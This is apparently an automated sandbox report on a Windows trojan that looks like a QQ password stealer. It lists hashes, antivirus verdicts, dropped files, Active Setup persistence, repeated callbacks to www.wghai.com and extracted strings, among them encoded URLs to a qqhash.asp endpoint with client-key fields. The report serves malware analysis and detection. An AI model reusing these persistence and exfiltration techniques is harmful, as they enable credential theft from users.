Analysis Date2014-10-10 13:53:10
MD540337056c36e395faff6d45d28b68bee
SHA1aa751a020c26e19c736ba954e898869791f645a5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 019753b54886363a784c6b0f15439590 sha1: 3cb05d65e01117cc40e181ea40e51ce2aae0459e size: 495616
Section.rdata md5: 6f404c9ae4c8ff26baff1e44bf27fdac sha1: 7e1401af30b920c5f44ceb924058efc940b25ec0 size: 159744
Section.data md5: 7137416a0ac36283661b01b0996b84d4 sha1: 041664f7f2455fb58a102b96ed41ac83632fe6d1 size: 61440
Section.rsrc md5: cefd573a4755e7560bad13fd8d61f68b sha1: 541214d7afb58dbeb8a864fb4ab369f4bfb3704e size: 24576
Timestamp2010-02-04 18:55:25
PackerMicrosoft Visual C++ v6.0
PEhashc720b0d0758c09453be2a4b518cbce7491c1a80c
IMPhash6c94b187f43a26cdb16ec89e1874cf27
AV360 SafeTrojan.Generic.3602544
AVAd-AwareTrojan.Generic.3602544
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Risk.KLVO-6726
AVAvira (antivir)TR/Sisproc.A.1308
AVCA (E-Trust Ino)Win32/Oflwr.A!crypt
AVCAT (quickheal)Win32.VirTool.DelfInject.gen!X.4.a
AVClamAVWin.Trojan.Cosmu-1718
AVDr. WebTrojan.Siggen1.46072
AVEmsisoftTrojan.Generic.3602544
AVEset (nod32)Win32/QQPass.B worm
AVFortinetW32/QQPass.ELG!tr.pws
AVFrisk (f-prot)W32/MalwareS.AHAA
AVF-SecureTrojan:W32/DelfInject.R
AVGrisoft (avg)Win32/DH{IEEuEwNnCQJ4D3kegRMU}
AVIkarusTrojan.Win32.Cosmu
AVK7Backdoor ( 04c4cf3a1 )
AVKasperskyWorm.Win32.Generic
AVMalwareBytesno_virus
AVMcafeeRDN/Generic.dx!dg3
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Trojan.Generic.3602544
AVNormandoslegacy/Suspicious_Gen2.AJONI
AVRisingTrojan.Win32.Generic.11EBA58C
AVSophosno_virus
AVSymantecTrojan.Gen
AVTrend MicroTROJ_COSMU.AI
AVVirusBlokAda (vba32)no_virus
AVYara APTno_virus
AVZillya!Trojan.Cosmu.Win32.2777

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings\JITDebug ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AA7BE134-9ACE-2457-ABD0-3AE14579BDE1}\StubPath ➝
C:\WINDOWS\system32\conme.vbs\\x00
Creates FileC:\WINDOWS\system32\conme.vbs
Creates FileC:\WINDOWS\system32\Txplatfrom.exe
Creates FileC:\WINDOWS\system32\wings.bak
Creates ProcessC:\WINDOWS\system32\Txplatfrom.exe

Process
↳ C:\WINDOWS\system32\Txplatfrom.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AA7BE134-9ACE-2457-ABD0-3AE14579BDE1}\StubPath ➝
C:\WINDOWS\system32\conme.vbs\\x00
Creates FileC:\WINDOWS\system32\conme.vbs
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNSwww.for-ever.cn
Type: A
208.73.211.245
DNSwww.wghai.com
Type: A
HTTP GEThttp://www.wghai.com/?%66%72%6F%6D%75%69%64%3D%32%37%38%31%33%37%37
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://www.wghai.com/?%66%72%6F%6D%75%69%64%3D%32%37%38%31%33%37%37
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://www.wghai.com/?%66%72%6F%6D%75%69%64%3D%32%37%38%31%33%37%37
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://www.wghai.com/?%66%72%6F%6D%75%69%64%3D%32%37%38%31%33%37%37
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 208.73.211.245:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.245:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.245:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.245:80

Raw Pcap
0x00000000 (00000)   47455420 2f3f2536 36253732 25364625   GET /?%66%72%6F%
0x00000010 (00016)   36442537 35253639 25363425 33442533   6D%75%69%64%3D%3
0x00000020 (00032)   32253337 25333825 33312533 33253337   2%37%38%31%33%37
0x00000030 (00048)   25333720 48545450 2f312e31 0d0a5573   %37 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000050 (00080)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000060 (00096)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000070 (00112)   646f7773 204e5420 352e3029 0d0a4163   dows NT 5.0)..Ac
0x00000080 (00128)   63657074 3a202a2f 2a0d0a48 6f73743a   cept: */*..Host:
0x00000090 (00144)   20777777 2e776768 61692e63 6f6d0d0a    www.wghai.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....

0x00000000 (00000)   47455420 2f3f2536 36253732 25364625   GET /?%66%72%6F%
0x00000010 (00016)   36442537 35253639 25363425 33442533   6D%75%69%64%3D%3
0x00000020 (00032)   32253337 25333825 33312533 33253337   2%37%38%31%33%37
0x00000030 (00048)   25333720 48545450 2f312e31 0d0a5573   %37 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000050 (00080)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000060 (00096)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000070 (00112)   646f7773 204e5420 352e3029 0d0a4163   dows NT 5.0)..Ac
0x00000080 (00128)   63657074 3a202a2f 2a0d0a48 6f73743a   cept: */*..Host:
0x00000090 (00144)   20777777 2e776768 61692e63 6f6d0d0a    www.wghai.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....

0x00000000 (00000)   47455420 2f3f2536 36253732 25364625   GET /?%66%72%6F%
0x00000010 (00016)   36442537 35253639 25363425 33442533   6D%75%69%64%3D%3
0x00000020 (00032)   32253337 25333825 33312533 33253337   2%37%38%31%33%37
0x00000030 (00048)   25333720 48545450 2f312e31 0d0a5573   %37 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000050 (00080)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000060 (00096)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000070 (00112)   646f7773 204e5420 352e3029 0d0a4163   dows NT 5.0)..Ac
0x00000080 (00128)   63657074 3a202a2f 2a0d0a48 6f73743a   cept: */*..Host:
0x00000090 (00144)   20777777 2e776768 61692e63 6f6d0d0a    www.wghai.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....

0x00000000 (00000)   47455420 2f3f2536 36253732 25364625   GET /?%66%72%6F%
0x00000010 (00016)   36442537 35253639 25363425 33442533   6D%75%69%64%3D%3
0x00000020 (00032)   32253337 25333825 33312533 33253337   2%37%38%31%33%37
0x00000030 (00048)   25333720 48545450 2f312e31 0d0a5573   %37 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000050 (00080)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000060 (00096)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000070 (00112)   646f7773 204e5420 352e3029 0d0a4163   dows NT 5.0)..Ac
0x00000080 (00128)   63657074 3a202a2f 2a0d0a48 6f73743a   cept: */*..Host:
0x00000090 (00144)   20777777 2e776768 61692e63 6f6d0d0a    www.wghai.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....


Strings
===X....
....  ................
"#
....
.........
10/.-,+*)('&%$#"! ..............
.....
..........
..
...
..
.........
-
..
x
....
==
...
.
 
-% BbmHpAadYySMI \
.-E-0-0..
00-+ 
e
 
00...........?-  
0
0 
0
?
.\
 
u

    
 ......
 (*.*)
#####
#######
080404b0
 %1 
1, 0, 0, 1017
	1uM
bregdll
bregdll.dll
BREGDRV
(&C)
(C) 2006-2008 360
CompanyName
	Ctrl+
	Ctrl+D
	Ctrl+End
	Ctrl+G
	Ctrl+Home
	Ctrl+N
	Ctrl+PageDown
	Ctrl+PageUp
	&D.
DEFAULT_ICON
 DLL 
(&E)
FileDescription
FileVersion
Gjjj
Gjjjj
Gjjjjjjjj
         (((((                  H
(&H)
(&I)
 INI 
InternalName
jjjj
LegalCopyright
msctls_progress32
msctls_updown32
MS Shell Dlg
(&N)
(null)
(&O)
<<<Obsolete>>
OriginalFilename
(&P)
	PageDown
	PageUp
ProductVersion
Progress1
\REGISTRY\MACHINE
\REGISTRY\MACHINE\SOFTWARE\CLASSES
\REGISTRY\MACHINE\SYSTEM\CURRENTCONTROLSET\HARDWARE PROFILES\CURRENT
\REGISTRY\USER
 %s 
(&S)
	Shift+Tab
Spin1
StringFileInfo
(&T)
	Tab/Enter
TEXTINCLUDE
Translation
VarFileInfo
VS_VERSION_INFO
xxxx
^,_^][
^$_^[]
 (*.*)|*.*||
	!	!	!	!	
000<0D0L0T0\0h0t0
"0(0.0g0l0
01171L1
0123456789ABCDEF
030806000000Z
031204000000Z
(&07-034/)7 '
070615000000Z
081022000000Z
090922034021Z0#
0B0H0Q0^0j0p0
0C1w1|1
> >$>(>,>0>@>D>H>L>P>T>X>\>`>d>p>
0dk:ghV
0http://crl.verisign.com/ThawteTimestampingCA.crl0
;$;0;L;a;w;~;
0R>\W[
101123235959Z0
1'1/171J1R1
1>1E1L1S1p1v1
120614235959Z0\1
1-232n2t2
130805235959Z0U1
131203235959Z0S1
,1"52.*
<1<;<L<Y<
1#QNAN
1#SNAN
1x283R3]3
201231235959Z0
2!21282?2W2n2
2%2*2:2@2
2 3(3H3P3k3u3
	2	5	5	5	5	5
<2<9<><E<L<r<
%+.2d%.2d
3%3>3F3K3W3\3y3
3%3R3\3
360se.exe
374<4[4h4u4
;3;9;C;I;c;i;q;
>'>.>4>
40474?4D4H4L4u4
4&4.484A4I4U4^4o4y4
4"5(5,50545
4\5`5h5l5t5x5
4C4J4_4
4S4p4w4
\$4t|Ht@H
|?5^<@
5	!	!	!	!
52F260023059454187AF826A3C07AF2A
5$535:5R5X5w5
	5	5	5
5"5*5=5C5Y5`5f5p5v5{5
5-5^5d5q5
5	5b5q5
6$6,646<6\7`7X:\:
	6	6	6	6
6@6[6`6|6
	6	6	6	6	6	6	6	6	6	6	,	,	,	,	,	,	,	,	+	+	+	+	+	/	/	/	'	'	'	'	'	'	'	'	'	'	(	(	(	(	(	(	(	(	(	(	(	(	(	
6 6)6;6G6[6f6u6
6^bMRQ4q
<"<)</<6<<<C<I<P<V<]<c<j<p<w<}<
6H8d8q8~8
6M6T6X6\6`6d6h6l6p6
6Z6e6y6
6Z6f6p6
707ca37322474f6ca841f0e224f4b620
7*727g7
	7	7	7	7	7	7	7	7	7	7	7	*	*	-	-	-	-
?7!Op1
81F1L1f1k1z1
;	;';8;K;`;~;
8MThdu
\$8UVW
9^0u/j
92F2~2
949?9J9T9\9g9u9
^}%95d
960801000000Z
9+909w9|9
9 9&9,969N9S9]9w9
9 9A9K9V9[9c9z9
'9A`u"9
9D:_:n:
9D$$t+
9L$x~e
9l$xtU9
9nPu	9^T
9o4u'V
	9oTtc
9t$0v8
9^xu5j
<A|2<Z
abcddefghijklmnoopqrrsstuvvwwxyyz;
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
abnormal program termination
Accept: */*
Accept: */* 
%a, %d %b %Y %H:%M:%S 
AddCode
AdjustWindowRectEx
Advapi32.dll
ADVAPI32.dll
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
Afx:%x:%x
Afx:%x:%x:%x:%x:%x
		A=hexstr.substr(i,1).toUpperCase();
		A=hexstr.toUpperCase();
:A:N:\:g:z:
AppendMenuA
		arr[arr.length]=A;
		arr[arr.length]='\\u'+D2H(hexstr.charCodeAt(i));
.?AUCThreadData@@
August
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CHECKLIST_STATE@@
.?AV_AFX_COLOR_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_SOCK_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVCArchiveException@@
.?AVCBitmap@@
.?AVCBrush@@
.?AVCButton@@
.?AVCClientDC@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCColorDialog@@
.?AVCComboBox@@
.?AVCCommonDialog@@
.?AVCCriticalSection@@
.?AVCDC@@
.?AVCDialog@@
.?AVCDWordArray@@
.?AVCEdit@@
.?AVCException@@
.?AVCFile@@
.?AVCFileDialog@@
.?AVCFileException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCImageList@@
.?AVCMapPtrToPtr@@
.?AVCMapStringToPtr@@
.?AVCMemFile@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AV_com_error@@
.?AVCPaintDC@@
.?AVCPen@@
.?AVCProgressCtrl@@
.?AVCPtrArray@@
.?AVCPtrList@@
.?AVCResourceException@@
.?AVCRgn@@
.?AVCSessionMapPtrToPtr@@
.?AVCSharedFile@@
.?AVCSimpleException@@
.?AVCStatic@@
.?AVCStringArray@@
.?AVCSyncObject@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempImageList@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCToolTipCtrl@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWindowDC@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVCWordArray@@
.?AVtype_info@@
<A|@<Z
B 02CV
/B1gwl5r
Bakdir=Bakdir&"\"
Bakdir=Bakdir&"wings.bak"
bcdfghijklmnpqrstuvwxyz
BeginPaint
BeginPath
Beijing1
Beijing1)0'
=b=h=l=p=t=
BitBlt
BKbhTb~XBK!;
 (*.BMP)|*.BMP|GIF
Bogus message code %d
BRegCloseKey
BRegCreateKey
BRegCreateKeyEx
BRegCreateKeyExW
BRegCreateKeyW
BRegDeleteKey
BRegDeleteKeyW
BRegDeleteValue
BRegDeleteValueW
bregdll.dll
BREGDRV
bregdrv.sys
bregdrv.sys.dat
BRegEnumKey
BRegEnumKeyEx
BRegEnumKeyExW
BRegEnumKeyW
BRegEnumValue
BRegEnumValueW
BRegOpenKey
BRegOpenKeyEx
BRegOpenKeyExW
BRegOpenKeyW
BRegQueryValueEx
BRegQueryValueExW
BRegSetValueEx
BRegSetValueExW
BRPj+S
BUG! http://www.super-ec.cn/
\??\BypassReg
\\.\BypassReg
B<Z1(3
C =02CVu
CallNextHookEx
CallWindowProcA
	Cape Town1
CArchiveException
CBitmap
c:\breg.dll
CBrush
CButton
CClientDC
CCmdTarget
CColorDialog
CColourPicker
CComboBox
CCriticalSection
Cc: %s
CDialog
CDWordArray
Certification Services Division1!0
CException
CFileDialog
CFileException
CGdiObject
CharUpperA
CheckMenuItem
ChildWindowFromPointEx
ChooseColorA
chrome.exe
CImageList
ck(WSbpS
clientkey
&@clientkey=
ClientToScreen
$@clientuin=
CloseClipboard
CloseDatabase
CloseHandle
ClosePrinter
CloseServiceHandle
CLSIDFromProgID
CLSIDFromString
CMapPtrToPtr
CMapStringToPtr
CMemFile
CMemoryException
CNotSupportedException
CObject
CoCreateInstance
CombineRgn
combobox
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
commctrl_DragListMsg
commdlg_ColorOK
commdlg_FileNameOK
commdlg_help
commdlg_LBSelChangedNotify
commdlg_SetRGBColor
commdlg_ShareViolation
ComObject
CompareStringA
CompareStringW
conme.vbs
Content-Transfer-Encoding: base64
Content-type: multipart/mixed; boundary="#BOUNDARY#"
Content-type: text/plain; charset="
CopyAcceleratorTableA
CopyFileA
CopyRect
CPaintDC
CPalette
CProgressCtrl
CPtrArray
CPtrList
CreateAcceleratorTableA
CreateBitmap
CreateCompatibleBitmap
CreateCompatibleDC
CreateDCA
CreateDialogIndirectParamA
CreateDIBitmap
CreateEllipticRgn
CreateEventA
CreateFileA
CreateFontIndirectA
CreateIconFromResource
CreateIconFromResourceEx
CreateMenu
CreatePalette
CreatePen
CreatePolygonRgn
CreatePopupMenu
CreateProcessA
CreateRectRgn
CreateRectRgnIndirect
CreateRemoteThread
CreateRoundRectRgn
CreateSemaphoreA
CreateServiceA
CreateSolidBrush
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CResourceException
CSharedFile
CStatic
CStringArray
CSyncObject
CTempDC
CTempGdiObject
CTempImageList
CTempMenu
CTempWnd
CToolTipCtrl
Ctrl+A
Ctrl+B
Ctrl+C
Ctrl+D
Ctrl+E
Ctrl+F
Ctrl+F1
Ctrl+F10
Ctrl+F11
Ctrl+F12
Ctrl+F2
Ctrl+F3
Ctrl+F4
Ctrl+F5
Ctrl+F6
Ctrl+F7
Ctrl+F8
Ctrl+F9
Ctrl+G
Ctrl+H
Ctrl+I
Ctrl+J
Ctrl+K
Ctrl+L
Ctrl+M
Ctrl+N
Ctrl+O
Ctrl+P
Ctrl+Q
Ctrl+R
Ctrl+S
Ctrl+Shift+F1
Ctrl+Shift+F10
Ctrl+Shift+F11
Ctrl+Shift+F12
Ctrl+Shift+F2
Ctrl+Shift+F3
Ctrl+Shift+F4
Ctrl+Shift+F5
Ctrl+Shift+F6
Ctrl+Shift+F7
Ctrl+Shift+F8
Ctrl+Shift+F9
Ctrl+T
Ctrl+U
Ctrl+V
Ctrl+W
Ctrl+X
Ctrl+Y
Ctrl+Z
 (*.CUR)|*.CUR|
CUserException
CWinApp
CWindowDC
c:\windows\qlog.txt
CWinFormUnit
CWinThread
CWordArray
?? / %d]
D$ _^][
D$,_^]
D$,;\$|
D$(_^]
D$(_^][
D$$_^[
D$$_^]
d09f2340818511d396f6aaf844c7e325
D$0UVW
D$0WPQ
D$ |2;
D$49D$$}
D$4j\P
D$4SUV
D$4SUV3
D$89Vdu
D$8PVQ
D$8RPj
D$8SUV
D$8VPQ
D$$~9+
@.data
Date: %s
D$(CUSWP
 %d/%d 
(%d-%d):
%d / %d
%d / %d]
dddd, MMMM dd, yyyy
D$dPQV
D$dQUWRP
D$dSUVW
D$DSWRPQ
D$DURP
December
DEFAULT_ICON
#define _AFX_NO_OLE_RESOURCES
#define _AFX_NO_PROPERTY_RESOURCES
#define _AFX_NO_SPLITTER_RESOURCES
#define _AFX_NO_TRACKER_RESOURCES
DefineDosDeviceA
DefWindowProcA
DELETE
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteFlag
DeleteMenu
DeleteObject
DeleteService
DestroyAcceleratorTable
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
device
devices
D$H_^][
D$|h`MJ
D$hQRP
D$hRPQ
D$hSUV3
D$hUPQ
D$HUPQ
D$HUSj
Dim OperationRegistry
Dim QQdir,Txpdir,Bakdir,len1,fso
disable
DispatchMessageA
DISPLAY
>D?J?X?
D$(;l$ 
DllRegisterServer
DllUnregisterServer
DLp_bc$
D$LPUj
D$LSUV
D$LUSWP
DocumentPropertiesA
DOMAIN error
D$,Pj<j
D$ PQR
D$PQRP
D$PRPQ
DPtoLP
D$ QhD 
D$$QhP 
D$ QhT 
D$(QPW
D$(QRP
D$$QRP
D$ QRPh<
D$$QUP
DrawEdge
DrawFocusRect
DrawFrameControl
DrawIconEx
DrawTextA
\drivers\bregdrv.sys
\drivers\efimon.sys
D$@RPQj
D$$RPQV
D$ RPUhD
D$(RPV
D$ RPW
D$,RVhhNJ
D$,SPh
D$(SUV
D$$SUV
D$(SUVW3
D$(t,;
D$TRPW
D$(t&S
D$TVPW
DuplicateHandle
D$@UPQ
Durbanville1
|$D UV
D$@WPS
D$$=xBI
D$XPQU
D$XQRWP
;D$xt&
D$XWQURPVS
ech1Y%
EDF19861DC454d15BA0B9E3FF9CA4F57
EfiLoadBitmap
efimon.sys
efiproc.dll
EHPWVS
Ellipse
   Else
    Else
      Else
         Else
EmptyClipboard
EnableMenuItem
EnableWindow
EndDialog
EndDoc
#endif
         End If
      End If
    End If
   End If
End If
#endif //_WIN32
EndPage
EndPaint
EndPath
EnterCriticalSection
EnumDisplayMonitors
EnumDisplaySettingsA
eQpenc
EqualRect
Error: 
ErrorInfo
Escape
ExcludeClipRect
ExitProcess
ExpandEnvironmentStringsA
ExtSelectClipRgn
ExtTextOutA
F<_^][
F,_^][
F\_^][
F09^4u*j
       F0.copy(Txpdir)
F49^8u&j
F89^8u&j
F(9V8tQ
FD@ul9L$(}f
FD uy9D$$}s
February
F%*.*f
F(_+F$^[;E
?fff&ff23
F$@;F(v
F$@@;F(v
FileTimeToLocalFileTime
FileTimeToSystemTime
FillRect
FillRgn
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
firefox.exe
F\jLSP
:\:f:k:p:u:
- floating point not loaded
; ;(;F;L;];t;~;
FlushFileBuffers
	for(var i=0;i<10;i++){
	for(var i=0;i<arr.length;i++){
	for(var i=0;i<hexstr.length;i++){
Fp'g1U#
FpHt&Ht
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
From: %s
[/fS_MR
function C2S(str){//code to string
function D2H(num){//
function H2D(hexstr){//
function S2C(hexstr){//str to code
Fxt_;FTu@
GAIsProcessorFeaturePresent
g~b1Y%
gb2312
=?gb2312?B?
Gdi32.dll
GDI32.dll
GetACP
GetActiveWindow
GetBkColor
GetBkMode
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipboardData
GetClipBox
GetClipRgn
GetCommandLineA
GetConnectString
GetCPInfo
GetCurrentObject
GetCurrentProcess
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDesktopWindow
GetDeviceCaps
GetDIBits
GetDlgCtrlID
GetDlgItem
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetExitCodeThread
GetFileAttributesA
GetFileSize
GetFileTime
GetFileTitleA
GetFileType
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFocus
GetForegroundWindow
GetFullPathNameA
GetKeyState
GetLastActivePopup
GetLastError
GetLocalTime
GetLogicalDriveStringsA
GetMenu
GetMenuCheckMarkDimensions
GetMenuItemCount
GetMenuItemID
GetMenuState
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleHandleA
GetMonitorInfoA
GetNextDlgTabItem
GetObjectA
GetOEMCP
GetOpenFileNameA
GetParent
GetPolyFillMode
GetProcAddress
GetProcessHeap
GetProcessVersion
GetProfileStringA
GetPropA
GetROP2
GetSaveFileNameA
GetScrollPos
GetScrollRange
GetStartupInfoA
GetStdHandle
GetStockObject
GetStretchBltMode
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetSystemPaletteEntries
GetSystemTime
GetTabList
GetTextColor
GetTextExtentPoint32A
GetTextMetricsA
GetTickCount
GetTimeZoneInformation
GetTopWindow
GetUserDefaultLCID
GetVersion
GetVersionExA
GetViewportExtEx
GetViewportOrgEx
GetVolumeInformationA
GetWindow
GetWindowDC
GetWindowExtEx
GetWindowLongA
GetWindowOrgEx
GetWindowPlacement
GetWindowRect
GetWindowTextA
GetWindowTextLengthA
GetWindowThreadProcessId
 (*.GIF)|*.GIF|
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalReAlloc
GlobalSize
GlobalUnlock
>;>G>O>W>g>~>
GrayStringA
`h````
h9n`u;
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
height
hgjlkbrfzaoe
HHtiHtGH
HHtpHHtl
History
H:mm:ss
HNb_``
HrCg@b	g(
:H:R:Z:`:h:q:z:
HSVHWtgHHtF
Ht#HHt
HtHHt(
HtHHuz
HtOHt)H
HtTHtFHt8Ht*Ht
HTTP/1.0
http://5010.qqdd.net/qqhash.asp
http://%77%77%77%2E%77%67%68%61%69%2E%63%6F%6D/?%66%72%6F%6D%75%69%64%3D%32%37%38%31%33%37%37
http://%77%77%77%2E%7A%77%73%63%6C%2E%63%6F%6D%2E%63%6E/%77%69%6E%67%73%62%6C%6F%67/%68%61%73%68%67%65%74/%71%71%68%61%73%68%2E%61%73%70
-http://crl.thawte.com/ThawteCodeSigningCA.crl0
/http://crl.thawte.com/ThawtePremiumServerCA.crl0
"http://crl.verisign.com/tss-ca.crl0
http://ocsp.thawte.com0
http://ocsp.verisign.com0
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
http://www.360.cn 0
hWj@_;
_hypot
 (*.ICO)|*.ICO|
iexplore.exe
		if(A=="A"){A='10'}
		if(A=="B"){A='11'}
		if(A=="C"){A='12'}
		if(A=="D"){A='13'}
		if(A=="E"){A='14'}
		if(A=="F"){A='15'}
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
#ifdef _WIN32
    If(FSO.FileExists(Bakdir)) Then
If(FSO.FileExists(Txpdir)) Then
         If(QQdir="") Then
      If(QQdir="") Then
   If(QQdir="") Then
If(QQdir="") Then
		if(S<16)break;
		if(S>9){S=str[S-10]}
		if(Y>9){Y=str[Y-10]}
ImageList_Destroy
#include "afxres.h"
#include "l.chs\afxres.rc"          // Standard components
InflateRect
InitCommonControlsEx
InitializeCriticalSection
InitRegEngine
; in line 
Install
InterlockedDecrement
InterlockedIncrement
InternetCanonicalizeUrlA
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetOpenA
InternetReadFile
InternetSetOptionA
IntersectRect
InvalidateRect
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsChild
IsDialogMessageA
IsIconic
IsRectEmpty
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
It#Iu%
\$\}-j
JanFebMarAprMayJunJulAugSepOctNovDec
January
JavaScript
jBWVSSQ
JcEG.k
JPEGMEM
 (*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
 (*.JPG)|*.JPG|BMP
JScript
(JScript
j VUPWQ
KERNEL32
\kernel32.dll
Kernel32.dll
KERNEL32.dll
KillTimer
kXEQ>\u
^l_^][
;l$ }:
L$ ]_^
L$$_^]
L$0PQR
L$0PQS
L$0SUV@W
L1P1\1`1p1|1
L23fff&ff
L$,_^]3
L$,_[3
L$4_^3
L$4_^[d
L$4j\Q
L$4S+L$0Qj
L$4UQWP
L$4VQUP
L$4WPQR
L$4WQUVS
L$8^]_3
L$89l$8}
L$8_^][d
L$8WPQR
Language
LANGUAGE 4, 2
LCMapStringA
LCMapStringW
L$`_^][d
L$|_^][d
L$ ^][d
L$ _^d
L$ _^][d
L$,_^][d
L$(_^][d
L$@^[d
L$@_^][d
L$$^[d
L$$^]d
L$$_^d
L$$_^]d
L$$_^][d
L$\_^][d
L$d_^][d
L$D_^[d
L$D_^][d
L$D_]d
L$DPQj
L$DQWR
L$DSVQ
LeaveCriticalSection
            len1=len(QQdir)-6
         len1=len(QQdir)-6
      len1=len(QQdir)-6
   len1=len(QQdir)-6
l	g~b0R 
l	g~b0Rdk
L$h_^]3
L$h_^][d
L$H_^][d
L$H][d
L$Hj&Q
l$HQRVU
L$HSUVWP
L$,hXMJ
LineTo
L$L_^]3
L$l_^][d
L$L^[d
L$L_^][d
L$LPQR
L$lRVQ
LoadBitmapA
LoadCursorA
LoadIconA
LoadImageA
LoadLibraryA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LocalReAlloc
LockFile
LockResource
L$P_^d
L$P_]^[d
L$ PQh
L$(PQR
L$@PQR
L$(PQS
L$<PQVV
L$pRPQ
LPtoDP
L$(PVQ
L$ QRP
L$ QSR
L$$Rh@ 
L$\Rh@ 
L$ RhH 
L$$RhP 
L$,RPQ
L$(RPQ
L$$RPQ
L$<RPQW
L$@RQj
L$@RUQ
L$<SQR
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpyn
lstrcpynA
